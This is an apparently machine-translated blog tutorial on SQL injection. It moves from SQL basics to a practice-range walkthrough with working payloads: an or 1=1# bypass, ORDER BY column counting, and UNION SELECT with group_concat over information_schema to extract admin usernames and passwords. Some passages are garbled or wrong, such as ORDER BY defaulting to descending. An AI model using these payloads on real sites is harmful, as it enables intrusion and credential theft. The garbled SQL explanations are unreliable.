table of Contents
- Condition query
- Query order
- Limit result
- Joint query
- Display dislocation
- SQL built-in functions
- Built-in database and tables
- mycli auxiliary commands
- Sql injection type
- Combat shooting range
- Determine whether there is an injection point for the type, the type
- See how many fields he has
- Database query
- Get the table name
- Burst field name
- Get the password, view the value of the password field
- to sum up
To tell a joke, the whole world can be injected, but it cannot be injected into your heart.
(Subtext, you do not belong to the collection of the whole world, suppose you belong to the collection of humans, humans belong to the collection of worlds, you do not belong to the collection of worlds, so you do not belong to the collection of humans, so it is concluded that you are not a human!!!)
Let's take a look at the table in the environment first.
What kind of conditional query method is actually adding a where statement.
Here is an example.
Suppose Xiao Ming is extracted now
select * from hello where id=1; 或者 select * from hello where name="小明"; 或者 select * from hello where name="小明" or id = 1; 或者 select * from hello where id=1 and age=15;
default order by in sql is descending desc, sorting from small to large in descending order.
The default order.
select * from hello; #select * from hello order by desc;
But the point is not this.
it is this
select * from hello order by 1; select * from hello order by 3;
Look carefully at the following two results,
you will find this and
select * from hello order by id; select * from hello order by age;
So what's the specific use of this? Of course, it's not just for sorting. In fact, it's still a few fields when injecting.
x refers to where to start (counting from 0) y refers to how many to take from x.
For example, limit 0, 2
first one, and the second one
and so on.
For example, limit 1, 2
second and third one.
Let me give you an example to
extract the name and age, and use a joint query.
select name from hello union select age from hello;
This is to combine two different results together.
Pay attention to two points below: the
first joint part of the query can be two different tables.
The second is that the two results of the joint query must be the same.
Pay attention to one more result below
This, first of all, we have to know the number of fields returned in the first half of the query. What's the use? Look at the post-related example below.
How to play, just look at the result example.
SQL built-in functions
View database name
Back to the previous summary
Built-in database and tables
This is built-in, mainly for storing some tables, databases, and user information. This is very important. Basically, it is the entry point that is engaged in penetration injection, which is to obtain the user and password of the database.
For example, the correlation of this table.
Here is an example:
mycli auxiliary commands
This is a good thing, written in python, the function is to have a command prompt, making your operation more convenient.
Sql injection type
This is divided into two types, one is plastic injection and the other is character injection.
What is the difference between these two things, or why they are divided into these two, is actually due to the query statement.
In a url URL, a very typical one is "?id=content" and the following id=1 is combined with the back-end data interaction to generate a query statement, for example:
https://hello.com?id=5假设这个是页面切换的网址 那么对应的sql查询语句可能就是 select html_view from html_views where id = 5 这个就是整形 或者 select html_view from html_views where id = '5'这个就是字符
Now let's try
Obviously, this thing treats that as a character. According to reason, if it is plastic, then 1+1 is 2. Then it will return to this page
. Try it now, get all the data, and inject it. This is low-level, so there is no filtering, and it is injected directly.
This is equivalent to forming such a sentence
select * from table where id='' or 1=1#';
That is just equivalent. In addition, this is not a blind shot, it has obvious hints, it is a relatively basic shooting range. Just look at the music. This example mainly introduces the injection type.
Combat shooting range
If it wasn't for me, if it wasn't for what it was, then whoever went to the shooting range would be close.
This is a classic example.
We got his administrator password
Determine whether there is an injection point for the type, the type
In fact, it is directly the id injection point, but it depends on what type it is.
If you want to inject characters, you have to add a # sign, right?
See how many fields he has
This is to guess by luck
3 no way,
How to play? Look at this.
So, get it, go to the database
Get the table name
This is actually just a look, let me make it clearer here.
Do you remember the previous instruction?
union select table_name from information_schema.tables where table_schema='huterox';
First introduce a group_concat() function.
This is actually to check what values are under the current field.
union select table_name from information_schema.tables where table_schema='maoshe';
We query the current table, that is, the field name of the table that stores maoshe, and we also need to get the value inside, so that we know which tables are in this.
So add a job
union select group_concat(table_name) from information_schema.tables where table_schema='maoshe'
Burst field name
A wave of blind guesses is the admin, and there is what I want in it.
Let's take a look at what's in the admin user.
union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
Get the password, view the value of the password field
union select 1,group_concat(username,":",password) from maoshe.admin
to sum up
how many fields there are . 2. After knowing a few fields, use the joint query to do things
. 3. Know some of the built-in databases of SQL, such as where the tables are placed.
4. Good luck, got a vulnerable website, except for the shooting range.
The key point is to
know what the database is.
Guess which user table is.
Guess what fields are in the user table.
Extract field values